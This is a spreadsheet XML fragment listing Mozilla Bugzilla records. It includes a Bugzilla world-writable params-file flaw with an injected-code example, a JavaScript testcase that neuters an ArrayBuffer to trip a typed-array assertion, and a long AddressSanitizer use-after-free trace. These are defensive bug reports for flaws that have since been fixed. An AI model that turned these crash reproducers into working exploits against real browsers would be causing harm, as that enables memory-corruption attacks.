          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J6062" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K6062" t="inlineStr">
        <is>
          <t>2.15</t>
        </is>
      </c>
      <c r="L6062" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6062" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N6062" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6062" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6062" t="inlineStr">
        <is>
          <t>applied to 2.14.2</t>
        </is>
      </c>
      <c r="Q6062" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6062" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6062" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T6062" t="n">
        <v>1</v>
      </c>
      <c r="U6062" t="n">
        <v>0</v>
      </c>
      <c r="V6062" t="n">
        <v>24</v>
      </c>
      <c r="W6062" t="inlineStr">
        <is>
          <t>If the dir isn't there, it tires to create it, and make it world writable. This
is a bad idea - if it doesn't exist, we should die.
The params file is also world writable, which is even a worse idea, because even
with a webservergroup, the perms are 771, so if you know the name of the file, a
local user can overwrite it, and add code to do whatever they want:
if ($::userid = 12345) { $::usergroupset = whatever; }
for example. How can defparams.pl check if a webservergroup was specified?
How about we move the WriteParams stuff into checksetup.pl? This would also mean
that params can be used in checksetup in a cleaner way.
Changing params would then just copy the perms on the existing file. This
wouldn't help the non-webservergroup case, though - see bug 107513.</t>
        </is>
      </c>
      <c r="X6062" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6063">
      <c r="A6063" t="n">
        <v>988719</v>
      </c>
      <c r="B6063" t="inlineStr">
        <is>
          <t>2014-03-26 21:36:12 -0700</t>
        </is>
      </c>
      <c r="C6063" t="inlineStr">
        <is>
          <t>Assertion failure: end &lt;= tarray-&gt;length(), at vm/TypedArrayObject.cpp or Assertion failure: begin &lt;= tarray-&gt;length(), at vm/TypedArrayObject.cpp</t>
        </is>
      </c>
      <c r="D6063" t="inlineStr">
        <is>
          <t>2015-08-30 12:12:10 -0700</t>
        </is>
      </c>
      <c r="E6063" t="n">
        <v>1</v>
      </c>
      <c r="F6063" t="n">
        <v>1</v>
      </c>
      <c r="G6063" t="n">
        <v>3</v>
      </c>
      <c r="H6063" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6063" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6063" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K6063" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6063" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M6063" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N6063" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6063" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6063" t="inlineStr">
        <is>
          <t>[jsbugmon:update,testComment=14,origRev=e9cb7cf27ce7][adv-main30+][adv-esr24.6+]</t>
        </is>
      </c>
      <c r="Q6063" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6063" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6063" t="inlineStr">
        <is>
          <t>mozilla32</t>
        </is>
      </c>
      <c r="T6063" t="n">
        <v>1</v>
      </c>
      <c r="U6063" t="n">
        <v>0</v>
      </c>
      <c r="V6063" t="n">
        <v>19</v>
      </c>
      <c r="W6063" t="inlineStr">
        <is>
          <t>Created attachment 8397598
stack
x = ArrayBuffer(4)
Uint8Array(x).subarray({
    valueOf: function() {
        neuter(x)
    }
})
asserts js debug shell on m-i changeset 52f43e3f552f without any CLI arguments at Assertion failure: end &lt;= tarray-&gt;length(), at vm/TypedArrayObject.cpp
My configure flags are:
CC="clang -Qunused-arguments" CXX="clang++ -Qunused-arguments" AR=ar sh /Users/skywalker/trees/mozilla-inbound/js/src/configure --target=x86_64-apple-darwin12.5.0 --enable-optimize --enable-debug --enable-profiling --enable-gczeal --enable-debug-symbols --disable-tests --with-ccache --enable-threadsafe &lt;other NSPR options&gt;
autoBisect shows this is probably related to the following changeset:
The first bad revision is:
changeset:   http://hg.mozilla.org/mozilla-central/rev/6d4ff510c117
user:        Luke Wagner
date:        Thu Oct 24 08:59:59 2013 -0500
summary:     Bug 929786 - Add shell function to neutering (r=sfink)
s-s because this involves typed arrays and neuter.
I don't think it's bug 929786, instead this might be an improvement to jsfunfuzz post-pwn2own that caused this to show up. If anyone comes up with a testcase that does not involve the neuter function, we can possibly bisect further back if necessary.
Setting needinfo? from Waldo since he (and Steve) took a look at most of the typed array issues that came up during pwn2own.</t>
        </is>
      </c>
      <c r="X6063" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6064">
      <c r="A6064" t="n">
        <v>1252306</v>
      </c>
      <c r="B6064" t="inlineStr">
        <is>
          <t>2016-02-29 16:38:32 -0800</t>
        </is>
      </c>
      <c r="C6064" t="inlineStr">
        <is>
          <t>Link clicker intro screen code upgrade</t>
        </is>
      </c>
      <c r="D6064" t="inlineStr">
        <is>
          <t>2016-03-25 16:10:00 -0700</t>
        </is>
      </c>
      <c r="E6064" t="n">
        <v>1</v>
      </c>
      <c r="F6064" t="n">
        <v>1</v>
      </c>
      <c r="G6064" t="n">
        <v>6</v>
      </c>
      <c r="H6064" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I6064" t="inlineStr">
        <is>
          <t>Hello (Loop)</t>
        </is>
      </c>
      <c r="J6064" t="inlineStr">
        <is>
          <t>Client</t>
        </is>
      </c>
      <c r="K6064" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6064" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6064" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6064" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6064" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6064" t="inlineStr">
        <is>
          <t>[btpp-fix-now]</t>
        </is>
      </c>
      <c r="Q6064" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6064" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6064" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6064" t="n">
        <v>1</v>
      </c>
      <c r="U6064" t="n">
        <v>0</v>
      </c>
      <c r="V6064" t="n">
        <v>6</v>
      </c>
      <c r="W6064" t="inlineStr">
        <is>
          <t>Code improvements for slideshow and settings data.
Optimize code
Close and Got It! buttons should use the same call-back function in slide overlay component and passed down to slide level buttons.
Telemetery: 
could set the button values differently to provide historical data on what was clicked.  This should be done sooner than later and can be done way before telemetry is implemented.</t>
        </is>
      </c>
      <c r="X6064" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6065">
      <c r="A6065" t="n">
        <v>850931</v>
      </c>
      <c r="B6065" t="inlineStr">
        <is>
          <t>2013-03-13 17:15:32 -0700</t>
        </is>
      </c>
      <c r="C6065" t="inlineStr">
        <is>
          <t>Heap-use-after-free in nsFrameList::FirstChild</t>
        </is>
      </c>
      <c r="D6065" t="inlineStr">
        <is>
          <t>2024-05-30 08:01:15 -0700</t>
        </is>
      </c>
      <c r="E6065" t="n">
        <v>1</v>
      </c>
      <c r="F6065" t="n">
        <v>1</v>
      </c>
      <c r="G6065" t="n">
        <v>3</v>
      </c>
      <c r="H6065" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6065" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6065" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K6065" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6065" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6065" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6065" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6065" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6065" t="inlineStr">
        <is>
          <t>[asan][adv-main21+][adv-esr1706+]</t>
        </is>
      </c>
      <c r="Q6065" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6065" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6065" t="inlineStr">
        <is>
          <t>mozilla22</t>
        </is>
      </c>
      <c r="T6065" t="n">
        <v>1</v>
      </c>
      <c r="U6065" t="n">
        <v>0</v>
      </c>
      <c r="V6065" t="n">
        <v>29</v>
      </c>
      <c r="W6065" t="inlineStr">
        <is>
          <t>Created attachment 724696
Testcase
&gt;==16813== ERROR: AddressSanitizer: heap-use-after-free on address 0x6004001e15b0 at pc 0x7f805347f8ae bp 0x7fffc90887b0 sp 0x7fffc90887a8
&gt;READ of size 8 at 0x6004001e15b0 thread T0
&gt;    #0 0x7f805347f8ad in nsFrameList::FirstChild() const src/../../../dist/include/nsFrameList.h:229
&gt;    #1 0x7f8053cbba5e in nsOverflowContinuationTracker::Finish(nsIFrame*) src/layout/generic/nsContainerFrame.cpp:1745
&gt;    #2 0x7f8053c61fec in nsBlockReflowContext::ReflowBlock(nsRect const&amp;, bool, nsCollapsingMargin&amp;, int, bool, nsLineBox*, nsHTMLReflowState&amp;, unsigned int&amp;, nsBlockReflowState&amp;) src/layout/generic/nsBlockReflowContext.cpp:304
&gt;    #3 0x7f8053c0aba2 in nsBlockFrame::ReflowBlockFrame(nsBlockReflowState&amp;, nsLineList_iterator, bool*) src/layout/generic/nsBlockFrame.cpp:3090
&gt;    #4 0x7f8053c004b7 in nsBlockFrame::ReflowLine(nsBlockReflowState&amp;, nsLineList_iterator, bool*) src/layout/generic/nsBlockFrame.cpp:2501
&gt;    #5 0x7f8053be9ce6 in nsBlockFrame::ReflowDirtyLines(nsBlockReflowState&amp;) src/layout/generic/nsBlockFrame.cpp:2023
&gt;    #6 0x7f8053bdd3fa in nsBlockFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) src/layout/generic/nsBlockFrame.cpp:1067
&gt;    #7 0x7f8053cbb198 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) src/layout/generic/nsContainerFrame.cpp:968
&gt;    #8 0x7f8053c9ee3d in nsColumnSetFrame::ReflowChildren(nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;, nsColumnSetFrame::ReflowConfig const&amp;, bool, nsCollapsingMargin*, nsColumnSetFrame::ColumnBalanceData&amp;) src/layout/generic/nsColumnSetFrame.cpp:671
&gt;    #9 0x7f8053ca613f in nsColumnSetFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) src/layout/generic/nsColumnSetFrame.cpp:1045
&gt;    #10 0x7f8053cbb198 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) src/layout/generic/nsContainerFrame.cpp:968
&gt;    #11 0x7f8053cbe4da in nsContainerFrame::ReflowOverflowContainerChildren(nsPresContext*, nsHTMLReflowState const&amp;, nsOverflowAreas&amp;, unsigned int, unsigned int&amp;) src/layout/generic/nsContainerFrame.cpp:1148
&gt;    #12 0x7f8053bdced2 in nsBlockFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) src/layout/generic/nsBlockFrame.cpp:1042
&gt;    #13 0x7f8053cbb198 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) src/layout/generic/nsContainerFrame.cpp:968
&gt;    #14 0x7f8053c9ee3d in nsColumnSetFrame::ReflowChildren(nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;, nsColumnSetFrame::ReflowConfig const&amp;, bool, nsCollapsingMargin*, nsColumnSetFrame::ColumnBalanceData&amp;) src/layout/generic/nsColumnSetFrame.cpp:671
&gt;    #15 0x7f8053ca46ff in nsColumnSetFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) src/layout/generic/nsColumnSetFrame.cpp:941
&gt;    #16 0x7f8053cbb198 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) src/layout/generic/nsContainerFrame.cpp:968
&gt;    #17 0x7f8053e70018 in nsCanvasFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) src/layout/generic/nsCanvasFrame.cpp:487
&gt;    #18 0x7f8053cbb198 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) src/layout/generic/nsContainerFrame.cpp:968
&gt;    #19 0x7f8053de6161 in nsHTMLScrollFrame::ReflowScrolledFrame(ScrollReflowState*, bool, bool, nsHTMLReflowMetrics*, bool) src/layout/generic/nsGfxScrollFrame.cpp:430
&gt;    #20 0x7f8053de9df0 in nsHTMLScrollFrame::ReflowContents(ScrollReflowState*, nsHTMLReflowMetrics const&amp;) src/layout/generic/nsGfxScrollFrame.cpp:530
&gt;    #21 0x7f8053dee2b3 in nsHTMLScrollFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) src/layout/generic/nsGfxScrollFrame.cpp:771
&gt;    #22 0x7f8053cbb198 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) src/layout/generic/nsContainerFrame.cpp:968
&gt;    #23 0x7f80541a0ebd in ViewportFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) src/layout/generic/nsViewportFrame.cpp:202
&gt;    #24 0x7f80539480b2 in PresShell::DoReflow(nsIFrame*, bool) src/layout/base/nsPresShell.cpp:7801
&gt;    #25 0x7f8053975911 in PresShell::ProcessReflowCommands(bool) src/layout/base/nsPresShell.cpp:7942
&gt;    #26 0x7f80539740cd in PresShell::FlushPendingNotifications(mozilla::ChangesToFlush) src/layout/base/nsPresShell.cpp:3932
&gt;    #27 0x7f8053972727 in PresShell::FlushPendingNotifications(mozFlushType) src/layout/base/nsPresShell.cpp:3778
&gt;    #28 0x7f805378449f in nsDocumentViewer::LoadComplete(tag_nsresult) src/layout/base/nsDocumentViewer.cpp:987
&gt;    #29 0x7f805b4c91dd in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, tag_nsresult) src/docshell/base/nsDocShell.cpp:6710
&gt;    #30 0x7f805b4c11db in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, tag_nsresult) src/docshell/base/nsDocShell.cpp:6538
&gt;    #31 0x7f805b4c2109 in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, tag_nsresult) src/docshell/base/nsDocShell.cpp:6545
&gt;    #32 0x7f805b5c4cdb in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&amp;, tag_nsresult) src/uriloader/base/nsDocLoader.cpp:1290
&gt;    #33 0x7f805b5c257c in nsDocLoader::doStopDocumentLoad(nsIRequest*, tag_nsresult) src/uriloader/base/nsDocLoader.cpp:870
&gt;    #34 0x7f805b5bb8a4 in nsDocLoader::DocLoaderIsEmpty(bool) src/uriloader/base/nsDocLoader.cpp:760
&gt;    #35 0x7f805b5bfb5b in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, tag_nsresult) src/uriloader/base/nsDocLoader.cpp:644
&gt;    #36 0x7f805b5c121a in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, tag_nsresult) src/uriloader/base/nsDocLoader.cpp:648
&gt;    #37 0x7f80519d4c03 in nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, tag_nsresult) src/netwerk/base/src/nsLoadGroup.cpp:676
&gt;    #38 0x7f80551f3ec5 in nsDocument::DoUnblockOnload() src/content/base/src/nsDocument.cpp:7881
&gt;    #39 0x7f80551f391b in nsDocument::UnblockOnload(bool) src/content/base/src/nsDocument.cpp:7809
&gt;    #40 0x7f805519499b in nsDocument::DispatchContentLoadedEvents() src/content/base/src/nsDocument.cpp:4443
&gt;    #41 0x7f8055297a1a in nsRunnableMethodImpl&lt;void (nsDocument::*)(), true&gt;::Run() src/../../../dist/include/nsThreadUtils.h:367
&gt;    #42 0x7f80611ff057 in nsThread::ProcessNextEvent(bool, bool*) src/xpcom/threads/nsThread.cpp:627
&gt;    #43 0x7f8060eac572 in NS_ProcessNextEvent_P(nsIThread*, bool) src/objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:238
&gt;    #44 0x7f805d9ca369 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) src/ipc/glue/MessagePump.cpp:82
&gt;    #45 0x7f80614c54eb in MessageLoop::RunInternal() src/ipc/chromium/src/base/message_loop.cc:216
&gt;    #46 0x7f80614c533e in MessageLoop::RunHandler() src/ipc/chromium/src/base/message_loop.cc:209
&gt;    #47 0x7f80614c5229 in MessageLoop::Run() src/ipc/chromium/src/base/message_loop.cc:183
&gt;    #48 0x7f805ce4ff4e in nsBaseAppShell::Run() src/widget/xpwidgets/nsBaseAppShell.cpp:163
&gt;    #49 0x7f805ba8efa0 in nsAppStartup::Run() src/toolkit/components/startup/nsAppStartup.cpp:288
&gt;    #50 0x7f805176d11c in XREMain::XRE_mainRun() src/toolkit/xre/nsAppRunner.cpp:3880
&gt;    #51 0x7f80517727c9 in XREMain::XRE_main(int, char**, nsXREAppData const*) src/toolkit/xre/nsAppRunner.cpp:3947
&gt;    #52 0x7f8051775285 in XRE_main src/toolkit/xre/nsAppRunner.cpp:4150
&gt;    #53 0x427f37 in do_main(int, char**, nsIFile*) src/browser/app/nsBrowserApp.cpp:228
&gt;    #54 0x4250f1 in main src/browser/app/nsBrowserApp.cpp:529
&gt;    #55 0x7f807264476c in
&gt;    #56 0x424864 in
&gt;0x6004001e15b0 is located 0 bytes inside of 16-byte region [0x6004001e15b0,0x6004001e15c0)
&gt;freed by thread T0 here:
&gt;    #0 0x4186d2 in __interceptor_free
&gt;    #1 0x7f807366077e in moz_free src/memory/mozalloc/mozalloc.cpp:48
&gt;    #2 0x7f8053cc356d in TryRemoveFrame(nsIFrame*, mozilla::FramePropertyTable*, mozilla::FramePropertyDescriptor const*, nsIFrame*, bool (nsFrameList::*)(nsIFrame*)) src/../../dist/include/mozilla/mozalloc.h:225
&gt;    #3 0x7f8053cc2799 in nsContainerFrame::StealFrame(nsPresContext*, nsIFrame*, bool) src/layout/generic/nsContainerFrame.cpp:1259
&gt;    #4 0x7f8053c41d6f in nsBlockFrame::StealFrame(nsPresContext*, nsIFrame*, bool) src/layout/generic/nsBlockFrame.cpp:5616
&gt;    #5 0x7f8053cc4e4c in nsContainerFrame::DeleteNextInFlowChild(nsPresContext*, nsIFrame*, bool) src/layout/generic/nsContainerFrame.cpp:1408
&gt;    #6 0x7f8053c4390b in nsBlockFrame::DeleteNextInFlowChild(nsPresContext*, nsIFrame*, bool) src/layout/generic/nsBlockFrame.cpp:5701
&gt;    #7 0x7f8053c6210a in nsBlockReflowContext::ReflowBlock(nsRect const&amp;, bool, nsCollapsingMargin&amp;, int, bool, nsLineBox*, nsHTMLReflowState&amp;, unsigned int&amp;, nsBlockReflowState&amp;) src/layout/generic/nsBlockReflowContext.cpp:305
&gt;    #8 0x7f8053c0aba2 in nsBlockFrame::ReflowBlockFrame(nsBlockReflowState&amp;, nsLineList_iterator, bool*) src/layout/generic/nsBlockFrame.cpp:3090
&gt;    #9 0x7f8053c004b7 in nsBlockFrame::ReflowLine(nsBlockReflowState&amp;, nsLineList_iterator, bool*) src/layout/generic/nsBlockFrame.cpp:2501
&gt;    #10 0x7f8053be9ce6 in nsBlockFrame::ReflowDirtyLines(nsBlockReflowState&amp;) src/layout/generic/nsBlockFrame.cpp:2023
&gt;    #11 0x7f8053bdd3fa in nsBlockFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) src/layout/generic/nsBlockFrame.cpp:1067
&gt;    #12 0x7f8053cbb198 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) src/layout/generic/nsContainerFrame.cpp:968
&gt;    #13 0x7f8053c9ee3d in nsColumnSetFrame::ReflowChildren(nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;, nsColumnSetFrame::ReflowConfig const&amp;, bool, nsCollapsingMargin*, nsColumnSetFrame::ColumnBalanceData&amp;) src/layout/generic/nsColumnSetFrame.cpp:671
&gt;    #14 0x7f8053ca613f in nsColumnSetFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) src/layout/generic/nsColumnSetFrame.cpp:1045
&gt;    #15 0x7f8053cbb198 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) src/layout/generic/nsContainerFrame.cpp:968
&gt;    #16 0x7f8053cbe4da in nsContainerFrame::ReflowOverflowContainerChildren(nsPresContext*, nsHTMLReflowState const&amp;, nsOverflowAreas&amp;, unsigned int, unsigned int&amp;) src/layout/generic/nsContainerFrame.cpp:1148
&gt;    #17 0x7f8053bdced2 in nsBlockFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) src/layout/generic/nsBlockFrame.cpp:1042
&gt;    #18 0x7f8053cbb198 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) src/layout/generic/nsContainerFrame.cpp:968
&gt;    #19 0x7f8053c9ee3d in nsColumnSetFrame::ReflowChildren(nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;, nsColumnSetFrame::ReflowConfig const&amp;, bool, nsCollapsingMargin*, nsColumnSetFrame::ColumnBalanceData&amp;) src/layout/generic/nsColumnSetFrame.cpp:671
&gt;    #20 0x7f8053ca46ff in nsColumnSetFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) src/layout/generic/nsColumnSetFrame.cpp:941
&gt;    #21 0x7f8053cbb198 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) src/layout/generic/nsContainerFrame.cpp:968
&gt;    #22 0x7f8053e70018 in nsCanvasFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) src/layout/generic/nsCanvasFrame.cpp:487
&gt;    #23 0x7f8053cbb198 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) src/layout/generic/nsContainerFrame.cpp:968
&gt;    #24 0x7f8053de6161 in nsHTMLScrollFrame::ReflowScrolledFrame(ScrollReflowState*, bool, bool, nsHTMLReflowMetrics*, bool) src/layout/generic/nsGfxScrollFrame.cpp:430
&gt;    #25 0x7f8053de9df0 in nsHTMLScrollFrame::ReflowContents(ScrollReflowState*, nsHTMLReflowMetrics const&amp;) src/layout/generic/nsGfxScrollFrame.cpp:530
&gt;    #26 0x7f8053dee2b3 in nsHTMLScrollFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) src/layout/generic/nsGfxScrollFrame.cpp:771
&gt;    #27 0x7f8053cbb198 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) src/layout/generic/nsContainerFrame.cpp:968
&gt;    #28 0x7f80541a0ebd in ViewportFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) src/layout/generic/nsViewportFrame.cpp:202
&gt;    #29 0x7f80539480b2 in PresShell::DoReflow(nsIFrame*, bool) src/layout/base/nsPresShell.cpp:7801
&gt;previously allocated by thread T0 here:
&gt;    #0 0x4187b2 in __interceptor_malloc
&gt;    #1 0x7f80736608c5 in moz_xmalloc src/memory/mozalloc/mozalloc.cpp:54
&gt;    #2 0x7f8053cc0ae6 in nsOverflowContinuationTracker::Insert(nsIFrame*, unsigned int&amp;) src/../../dist/include/mozilla/mozalloc.h:201
&gt;    #3 0x7f8053cbf46e in nsContainerFrame::ReflowOverflowContainerChildren(nsPresContext*, nsHTMLReflowState const&amp;, nsOverflowAreas&amp;, unsigned int, unsigned int&amp;) src/layout/generic/nsContainerFrame.cpp:1185
&gt;    #4 0x7f8053bdced2 in nsBlockFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) src/layout/generic/nsBlockFrame.cpp:1042
&gt;    #5 0x7f8053cbb198 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) src/layout/generic/nsContainerFrame.cpp:968
&gt;    #6 0x7f8053c9ee3d in nsColumnSetFrame::ReflowChildren(nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;, nsColumnSetFrame::ReflowConfig const&amp;, bool, nsCollapsingMargin*, nsColumnSetFrame::ColumnBalanceData&amp;) src/layout/generic/nsColumnSetFrame.cpp:671
&gt;    #7 0x7f8053ca46ff in nsColumnSetFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) src/layout/generic/nsColumnSetFrame.cpp:941
&gt;    #8 0x7f8053cbb198 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) src/layout/generic/nsContainerFrame.cpp:968
&gt;    #9 0x7f8053cbe4da in nsContainerFrame::ReflowOverflowContainerChildren(nsPresContext*, nsHTMLReflowState const&amp;, nsOverflowAreas&amp;, unsigned int, unsigned int&amp;) src/layout/generic/nsContainerFrame.cpp:1148
&gt;    #10 0x7f8053bdced2 in nsBlockFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) src/layout/generic/nsBlockFrame.cpp:1042
&gt;    #11 0x7f8053cbb198 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) src/layout/generic/nsContainerFrame.cpp:968
&gt;    #12 0x7f8053c9ee3d in nsColumnSetFrame::ReflowChildren(nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;, nsColumnSetFrame::ReflowConfig const&amp;, bool, nsCollapsingMargin*, nsColumnSetFrame::ColumnBalanceData&amp;) src/layout/generic/nsColumnSetFrame.cpp:671
&gt;    #13 0x7f8053ca613f in nsColumnSetFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) src/layout/generic/nsColumnSetFrame.cpp:1045
&gt;    #14 0x7f8053cbb198 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) src/layout/generic/nsContainerFrame.cpp:968
